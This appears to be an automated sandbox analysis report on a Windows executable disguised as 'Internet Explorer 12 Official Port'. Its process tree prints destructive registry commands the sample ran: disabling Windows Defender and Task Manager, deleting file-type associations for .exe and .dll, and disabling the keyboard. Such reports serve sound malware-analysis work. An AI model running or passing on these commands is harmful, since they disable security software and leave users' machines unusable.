Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
24-04-2024 17:08
Static task
static1
1 signatures
General
-
Target
Internet Explorer 12 Official Port.exe
-
Size
220KB
-
MD5
575100faacdfe66876bc039999962151
-
SHA1
8f750c73b95bc39a7d884c9539698d3b61e122bb
-
SHA256
b9ad9fb27da30bc536f837ed0a5922b8f3bf0eb93a46e42369d13ad62777faab
-
SHA512
9ca59b4fda92e7a58fa2d92a7c15fbf6ac156c2cdac7c3851d48736ffcdda4f272524b13be54918d33dc72e8db1f05a7cef741822b60ab9b79c68e18d17c5046
-
SSDEEP
1536:F7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfuwljSZkKvnoHfhT:R7DhdC6kzWypvaQ0FxyNTBfuaj7T
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Disables Task Manager via registry modification
-
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 2732 wrote to memory of 2900 2732 Internet Explorer 12 Official Port.exe 29 PID 2732 wrote to memory of 2900 2732 Internet Explorer 12 Official Port.exe 29 PID 2732 wrote to memory of 2900 2732 Internet Explorer 12 Official Port.exe 29 PID 2732 wrote to memory of 2900 2732 Internet Explorer 12 Official Port.exe 29 PID 2900 wrote to memory of 2912 2900 cmd.exe 30 PID 2900 wrote to memory of 2912 2900 cmd.exe 30 PID 2900 wrote to memory of 2912 2900 cmd.exe 30 PID 2900 wrote to memory of 2340 2900 cmd.exe 31 PID 2900 wrote to memory of 2340 2900 cmd.exe 31 PID 2900 wrote to memory of 2340 2900 cmd.exe 31 PID 2900 wrote to memory of 2776 2900 cmd.exe 32 PID 2900 wrote to memory of 2776 2900 cmd.exe 32 PID 2900 wrote to memory of 2776 2900 cmd.exe 32 PID 2900 wrote to memory of 2736 2900 cmd.exe 33 PID 2900 wrote to memory of 2736 2900 cmd.exe 33 PID 2900 wrote to memory of 2736 2900 cmd.exe 33 PID 2900 wrote to memory of 2084 2900 cmd.exe 35 PID 2900 wrote to memory of 2084 2900 cmd.exe 35 PID 2900 wrote to memory of 2084 2900 cmd.exe 35 PID 2900 wrote to memory of 2152 2900 cmd.exe 36 PID 2900 wrote to memory of 2152 2900 cmd.exe 36 PID 2900 wrote to memory of 2152 2900 cmd.exe 36 PID 2900 wrote to memory of 3004 2900 cmd.exe 37 PID 2900 wrote to memory of 3004 2900 cmd.exe 37 PID 2900 wrote to memory of 3004 2900 cmd.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\Internet Explorer 12 Official Port.exe"C:\Users\Admin\AppData\Local\Temp\Internet Explorer 12 Official Port.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FAA.tmp\FAB.tmp\FAC.bat "C:\Users\Admin\AppData\Local\Temp\Internet Explorer 12 Official Port.exe""2⤵
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2912
-
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2340
-
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f3⤵PID:2776
-
-
C:\Windows\system32\reg.exereg delete HKCR/.exe3⤵PID:2736
-
-
C:\Windows\system32\reg.exereg delete HKCR/.dll3⤵PID:2084
-
-
C:\Windows\system32\reg.exereg delete HKCR/*3⤵PID:2152
-
-
\??\c:\windows\system32\rundll32.exec:\windows\system32\rundll32.exe keyboard,disable3⤵PID:3004
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
852B
MD51a56f95b492e68e5414b74978cb9bf2e
SHA1578fcbb790344df3d0989b0790f3bc1e33855793
SHA256abfc082eb62c3f93029b2cf2134a41fa5e315e821994dee6ab6acfda92b993e8
SHA512acffc8ebba901d2293897a5900d807142df8823b20eb821b0ba188013e038776ab4195b6947d9ba08669c24e26ec5251e9ea56dbe336f349637614aa0b71e9ff